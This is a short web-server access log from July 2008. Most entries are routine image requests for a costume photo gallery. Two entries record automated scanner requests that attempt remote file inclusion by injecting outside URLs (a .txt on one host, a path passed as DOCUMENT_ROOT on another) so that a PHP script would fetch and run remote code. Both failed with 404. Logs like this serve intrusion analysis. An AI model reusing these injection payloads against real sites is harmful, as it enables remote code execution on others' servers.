141.85.101.1 - - [30/Jul/2008:20:50:15 -0500] "GET /scanhttp://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.52.176.119 - - [30/Jul/2008:20:50:15 -0500] "GET /costume/costm37.jpg HTTP/1.1" 200 9819 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
209.52.176.119 - - [30/Jul/2008:20:50:15 -0500] "GET /costume/costm38.jpg HTTP/1.1" 200 9710 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
209.52.176.119 - - [30/Jul/2008:20:50:15 -0500] "GET /costume/costm39.jpg HTTP/1.1" 200 9800 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
209.52.176.119 - - [30/Jul/2008:20:50:16 -0500] "GET /costume/costm40.jpg HTTP/1.1" 200 60324 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
58.69.172.67 - - [30/Jul/2008:20:50:16 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
